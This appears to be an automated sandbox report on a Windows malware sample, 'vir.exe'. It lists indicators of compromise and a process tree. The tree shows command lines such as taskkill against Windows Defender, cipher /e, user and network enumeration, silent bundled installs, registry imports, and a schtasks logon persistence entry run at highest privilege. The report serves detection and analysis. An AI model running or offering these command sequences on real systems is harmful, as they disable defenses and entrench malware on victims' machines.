323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd psiphon-tunnel-core.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\phishing.url:favicon IEXPLORE.EXE -
Runs net.exe
-
Runs ping.exe 1 TTPs 18 IoCs
pid Process 1796 PING.EXE 3620 PING.EXE 2464 PING.EXE 2020 PING.EXE 492 PING.EXE 1664 PING.EXE 3612 PING.EXE 3300 PING.EXE 3356 PING.EXE 3764 PING.EXE 1972 PING.EXE 3320 PING.EXE 2108 PING.EXE 764 PING.EXE 3724 PING.EXE 3108 PING.EXE 3288 PING.EXE 2064 PING.EXE -
Runs regedit.exe 1 IoCs
pid Process 3332 regedit.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1500 schtasks.exe 3324 schtasks.exe 2816 schtasks.exe 2196 schtasks.exe 1148 schtasks.exe 3640 schtasks.exe 1684 schtasks.exe 3156 schtasks.exe 3108 schtasks.exe 1588 schtasks.exe 3152 schtasks.exe 3376 schtasks.exe 2860 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3568 vlc.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2140 WinaeroTweaker-1.40.0.0-setup.tmp 2140 WinaeroTweaker-1.40.0.0-setup.tmp 3052 powershell.exe 2272 iexplore.exe 2272 iexplore.exe 2272 iexplore.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
pid Process 3864 ac3.exe 3568 vlc.exe 2804 !FIXInj.exe 2908 Rover.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1284 tasklist.exe Token: SeDebugPrivilege 2096 taskkill.exe Token: SeDebugPrivilege 2908 Rover.exe Token: SeDebugPrivilege 2604 taskkill.exe Token: SeDebugPrivilege 3320 taskkill.exe Token: SeDebugPrivilege 1496 taskkill.exe Token: SeDebugPrivilege 1272 scary.exe Token: SeDebugPrivilege 3144 Romilyaa.exe Token: SeDebugPrivilege 3052 powershell.exe Token: SeDebugPrivilege 4020 Romilyaa.exe Token: SeRestorePrivilege 2120 insdrv.exe Token: SeRestorePrivilege 2120 insdrv.exe Token: SeRestorePrivilege 2120 insdrv.exe Token: SeRestorePrivilege 2120 insdrv.exe Token: SeRestorePrivilege 2120 insdrv.exe Token: SeRestorePrivilege 2120 insdrv.exe Token: SeRestorePrivilege 2120 insdrv.exe Token: SeRestorePrivilege 2120 insdrv.exe Token: SeRestorePrivilege 2120 insdrv.exe Token: SeRestorePrivilege 2120 insdrv.exe Token: SeRestorePrivilege 2120 insdrv.exe Token: SeRestorePrivilege 2120 insdrv.exe Token: SeRestorePrivilege 2120 insdrv.exe Token: SeRestorePrivilege 2120 insdrv.exe Token: SeRestorePrivilege 3636 DrvInst.exe Token: SeRestorePrivilege 3636 DrvInst.exe Token: SeRestorePrivilege 3636 DrvInst.exe Token: SeRestorePrivilege 3636 DrvInst.exe Token: SeRestorePrivilege 3636 DrvInst.exe Token: SeRestorePrivilege 3636 DrvInst.exe Token: SeRestorePrivilege 3636 DrvInst.exe Token: SeRestorePrivilege 3636 DrvInst.exe Token: SeRestorePrivilege 3636 DrvInst.exe Token: SeRestorePrivilege 3636 DrvInst.exe Token: SeRestorePrivilege 3636 DrvInst.exe Token: SeRestorePrivilege 3636 DrvInst.exe Token: SeRestorePrivilege 3636 DrvInst.exe Token: SeRestorePrivilege 3636 DrvInst.exe Token: SeRestorePrivilege 2288 rundll32.exe Token: SeRestorePrivilege 2288 rundll32.exe Token: SeRestorePrivilege 2288 rundll32.exe Token: SeRestorePrivilege 2288 rundll32.exe Token: SeRestorePrivilege 2288 rundll32.exe Token: SeRestorePrivilege 2288 rundll32.exe Token: SeRestorePrivilege 2288 rundll32.exe Token: SeDebugPrivilege 2428 Romilyaa.exe Token: SeBackupPrivilege 3168 vssvc.exe Token: SeRestorePrivilege 3168 vssvc.exe Token: SeAuditPrivilege 3168 vssvc.exe Token: SeBackupPrivilege 3636 DrvInst.exe Token: SeRestorePrivilege 3636 DrvInst.exe Token: SeRestorePrivilege 2120 insdrv.exe Token: SeLoadDriverPrivilege 2120 insdrv.exe Token: SeRestorePrivilege 3564 DrvInst.exe Token: SeRestorePrivilege 3564 DrvInst.exe Token: SeRestorePrivilege 3564 DrvInst.exe Token: SeRestorePrivilege 3564 DrvInst.exe Token: SeRestorePrivilege 3564 DrvInst.exe Token: SeRestorePrivilege 3564 DrvInst.exe Token: SeRestorePrivilege 3564 DrvInst.exe Token: SeRestorePrivilege 3564 DrvInst.exe Token: SeRestorePrivilege 3564 DrvInst.exe Token: SeRestorePrivilege 3564 DrvInst.exe Token: SeLoadDriverPrivilege 3564 DrvInst.exe -
Suspicious use of FindShellTrayWindow 44 IoCs
pid Process 2856 iexplore.exe 824 efsui.exe 824 efsui.exe 824 efsui.exe 2272 iexplore.exe 2140 WinaeroTweaker-1.40.0.0-setup.tmp 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 2272 iexplore.exe 3144 Romilyaa.exe 4020 Romilyaa.exe 2428 Romilyaa.exe 3140 Romilyaa.exe 3292 Romilyaa.exe 992 Romilyaa.exe 3568 vlc.exe 3568 vlc.exe 3568 vlc.exe 3568 vlc.exe 3568 vlc.exe 3568 vlc.exe 3568 vlc.exe 3568 vlc.exe 848 Romilyaa.exe 3336 Romilyaa.exe 3328 f3cb220f1aaa32ca310586e5f62dcab1.exe 3328 f3cb220f1aaa32ca310586e5f62dcab1.exe 3328 f3cb220f1aaa32ca310586e5f62dcab1.exe 1540 Romilyaa.exe 912 Romilyaa.exe 2852 Romilyaa.exe 3328 Romilyaa.exe -
Suspicious use of SendNotifyMessage 39 IoCs
pid Process 824 efsui.exe 824 efsui.exe 824 efsui.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3932 3.exe 3144 Romilyaa.exe 4020 Romilyaa.exe 2428 Romilyaa.exe 3140 Romilyaa.exe 3292 Romilyaa.exe 992 Romilyaa.exe 3568 vlc.exe 3568 vlc.exe 3568 vlc.exe 3568 vlc.exe 3568 vlc.exe 3568 vlc.exe 3568 vlc.exe 848 Romilyaa.exe 3336 Romilyaa.exe 3328 f3cb220f1aaa32ca310586e5f62dcab1.exe 3328 f3cb220f1aaa32ca310586e5f62dcab1.exe 3328 f3cb220f1aaa32ca310586e5f62dcab1.exe 1540 Romilyaa.exe 912 Romilyaa.exe 2852 Romilyaa.exe 3328 Romilyaa.exe -
Suspicious use of SetWindowsHookEx 28 IoCs
pid Process 2856 iexplore.exe 2856 iexplore.exe 2744 IEXPLORE.EXE 2744 IEXPLORE.EXE 2272 iexplore.exe 2272 iexplore.exe 2264 IEXPLORE.EXE 2264 IEXPLORE.EXE 3932 3.exe 3932 3.exe 2272 iexplore.exe 2272 iexplore.exe 3980 IEXPLORE.EXE 3980 IEXPLORE.EXE 3144 Romilyaa.exe 3980 IEXPLORE.EXE 3980 IEXPLORE.EXE 3880 IEXPLORE.EXE 3880 IEXPLORE.EXE 3568 vlc.exe 2264 IEXPLORE.EXE 2264 IEXPLORE.EXE 3880 IEXPLORE.EXE 3880 IEXPLORE.EXE 2432 IEXPLORE.EXE 2432 IEXPLORE.EXE 2432 IEXPLORE.EXE 2432 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2072 wrote to memory of 480 2072 vir.exe 31 PID 2072 wrote to memory of 480 2072 vir.exe 31 PID 2072 wrote to memory of 480 2072 vir.exe 31 PID 2072 wrote to memory of 480 2072 vir.exe 31 PID 480 wrote to memory of 2016 480 cmd.exe 33 PID 480 wrote to memory of 2016 480 cmd.exe 33 PID 480 wrote to memory of 2016 480 cmd.exe 33 PID 480 wrote to memory of 2016 480 cmd.exe 33 PID 480 wrote to memory of 1564 480 cmd.exe 34 PID 480 wrote to memory of 1564 480 cmd.exe 34 PID 480 wrote to memory of 1564 480 cmd.exe 34 PID 480 wrote to memory of 1564 480 cmd.exe 34 PID 480 wrote to memory of 1796 480 cmd.exe 36 PID 480 wrote to memory of 1796 480 cmd.exe 36 PID 480 wrote to memory of 1796 480 cmd.exe 36 PID 480 wrote to memory of 1796 480 cmd.exe 36 PID 2016 wrote to memory of 3000 2016 cmd.exe 38 PID 2016 wrote to memory of 3000 2016 cmd.exe 38 PID 2016 wrote to memory of 3000 2016 cmd.exe 38 PID 2016 wrote to memory of 3000 2016 cmd.exe 38 PID 1564 wrote to memory of 2028 1564 cmd.exe 39 PID 1564 wrote to memory of 2028 1564 cmd.exe 39 PID 1564 wrote to memory of 2028 1564 cmd.exe 39 PID 1564 wrote to memory of 2028 1564 cmd.exe 39 PID 2016 wrote to memory of 1204 2016 cmd.exe 40 PID 2016 wrote to memory of 1204 2016 cmd.exe 40 PID 2016 wrote to memory of 1204 2016 cmd.exe 40 PID 2016 wrote to memory of 1204 2016 cmd.exe 40 PID 1564 wrote to memory of 1932 1564 cmd.exe 41 PID 1564 wrote to memory of 1932 1564 cmd.exe 41 PID 1564 wrote to memory of 1932 1564 cmd.exe 41 PID 1564 wrote to memory of 1932 1564 cmd.exe 41 PID 2016 wrote to memory of 1940 2016 cmd.exe 42 PID 2016 wrote to memory of 1940 2016 cmd.exe 42 PID 2016 wrote to memory of 1940 2016 cmd.exe 42 PID 2016 wrote to memory of 1940 2016 cmd.exe 42 PID 1932 wrote to memory of 2164 1932 net.exe 43 PID 1932 wrote to memory of 2164 1932 net.exe 43 PID 1932 wrote to memory of 2164 1932 net.exe 43 PID 1932 wrote to memory of 2164 1932 net.exe 43 PID 1564 wrote to memory of 704 1564 cmd.exe 44 PID 1564 wrote to memory of 704 1564 cmd.exe 44 PID 1564 wrote to memory of 704 1564 cmd.exe 44 PID 1564 wrote to memory of 704 1564 cmd.exe 44 PID 704 wrote to memory of 1944 704 net.exe 45 PID 704 wrote to memory of 1944 704 net.exe 45 PID 704 wrote to memory of 1944 704 net.exe 45 PID 704 wrote to memory of 1944 704 net.exe 45 PID 1564 wrote to memory of 1284 1564 cmd.exe 47 PID 1564 wrote to memory of 1284 1564 cmd.exe 47 PID 1564 wrote to memory of 1284 1564 cmd.exe 47 PID 1564 wrote to memory of 1284 1564 cmd.exe 47 PID 480 wrote to memory of 2096 480 cmd.exe 48 PID 480 wrote to memory of 2096 480 cmd.exe 48 PID 480 wrote to memory of 2096 480 cmd.exe 48 PID 480 wrote to memory of 2096 480 cmd.exe 48 PID 480 wrote to memory of 888 480 cmd.exe 50 PID 480 wrote to memory of 888 480 cmd.exe 50 PID 480 wrote to memory of 888 480 cmd.exe 50 PID 480 wrote to memory of 888 480 cmd.exe 50 PID 2856 wrote to memory of 2744 2856 iexplore.exe 53 PID 2856 wrote to memory of 2744 2856 iexplore.exe 53 PID 2856 wrote to memory of 2744 2856 iexplore.exe 53 PID 2856 wrote to memory of 2744 2856 iexplore.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\vir.exe"C:\Users\Admin\AppData\Local\Temp\vir.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\!main.cmd" "2⤵
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:480 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K spread.cmd3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\SysWOW64\xcopy.exexcopy 1 C:\Users\Admin\Desktop4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:3000
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 2 C:\Users\Admin\Desktop4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1204
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 3 C:\Users\Admin\4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K doxx.cmd3⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\SysWOW64\ipconfig.exeipconfig4⤵
- Gathers network information
PID:2028
-
-
C:\Windows\SysWOW64\net.exenet accounts4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts5⤵
- System Location Discovery: System Language Discovery
PID:2164
-
-
-
C:\Windows\SysWOW64\net.exenet user4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:704 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user5⤵PID:1944
-
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /apps /v /fo table4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1284
-
-
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1796
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WindowsDefender.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K handler.cmd3⤵PID:888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K cipher.cmd3⤵
- System Location Discovery: System Language Discovery
PID:1320 -
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:2124
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:3480
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:3684
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:1052
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Rover.exeRover.exe3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\web.htm3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2272 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:275457 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2264
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:406532 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3980
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:734221 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3880
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:3748878 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2432
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Google.exeGoogle.exe3⤵
- Executes dropped EXE
PID:2240
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\helper.vbs"3⤵
- System Location Discovery: System Language Discovery
PID:2192
-
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1664
-
-
C:\Windows\SysWOW64\PING.EXEping mrbeast.codes -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1972
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Google.exe C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:3800
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Rover.exe C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:3820
-
-
C:\Windows\SysWOW64\xcopy.exexcopy spinner.gif C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:3836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K bloatware.cmd3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3844 -
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe1.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3924 -
C:\Program Files (x86)\DroidCam\vc_redist.x86.exe"C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1952 -
C:\Program Files (x86)\DroidCam\vc_redist.x86.exe"C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet -burn.unelevated BurnPipe.{C5BD4162-E564-4F77-B365-36BD5383442A} {309B46C4-58D8-4921-9D7C-3B790364B964} 19526⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c install.bat5⤵
- System Location Discovery: System Language Discovery
PID:3352 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "DroidCamFilter32.ax"6⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3724
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "DroidCamFilter64.ax"6⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3156 -
C:\Windows\system32\regsvr32.exe/s "DroidCamFilter64.ax"7⤵
- Loads dropped DLL
- Modifies registry class
PID:2280
-
-
-
-
C:\Program Files (x86)\DroidCam\lib\insdrv.exe"C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +a5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2120
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe3.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3932 -
C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exeC:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:3776
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=GB&client_asn=212238&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiR0IiLCJjbGllbnRfdmVyc2lvbiI6IjE3OSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyNC0xMS0wOFQwOToxOToxOC41NTVaIiwidG9rZW5zIjpudWxsLCJ2IjoxfQ5⤵PID:3744
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\2.hta"4⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K SilentSetup.cmd4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1916 -
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exeWinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3056 -
C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$102F6,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2140 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f7⤵
- System Location Discovery: System Language Discovery
PID:2232 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweaker.exe /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3320
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f7⤵
- System Location Discovery: System Language Discovery
PID:3084 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweakerhelper.exe /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\regmess.exeregmess.exe3⤵
- Executes dropped EXE
PID:3856 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\regmess_239e6675-cf83-4482-a135-4b30a903012e\regmess.bat" "4⤵PID:2156
-
C:\Windows\SysWOW64\reg.exereg import Setup.reg /reg:325⤵
- System Location Discovery: System Language Discovery
PID:2424
-
-
C:\Windows\SysWOW64\reg.exereg import Console.reg /reg:325⤵PID:1944
-
-
C:\Windows\SysWOW64\reg.exereg import Desktop.reg /reg:325⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:2684
-
-
C:\Windows\SysWOW64\reg.exereg import International.reg /reg:325⤵
- System Location Discovery: System Language Discovery
PID:2060
-
-
C:\Windows\SysWOW64\reg.exereg import Fonts.reg /reg:325⤵
- Modifies Internet Explorer settings
PID:3096
-
-
C:\Windows\SysWOW64\reg.exereg import Cursors.reg /reg:325⤵
- System Location Discovery: System Language Discovery
PID:3140
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 103⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3864
-
-
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\scary.exescary.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1272 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:3324
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3144 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:3108
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\vPDJkNgZb2qQ.bat" "5⤵PID:2316
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:2092
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3612
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4020 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:1588
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\DS2lJjxX5bYw.bat" "7⤵PID:3288
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:3076
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3320
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2428 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:2816
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Kzc7NpqR3EAQ.bat" "9⤵PID:3188
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:2352
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2108
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"10⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3140 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:2196
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\xMpCKpeM4s9U.bat" "11⤵PID:1260
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:2184
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3620
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"12⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3292 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:3152
-
-
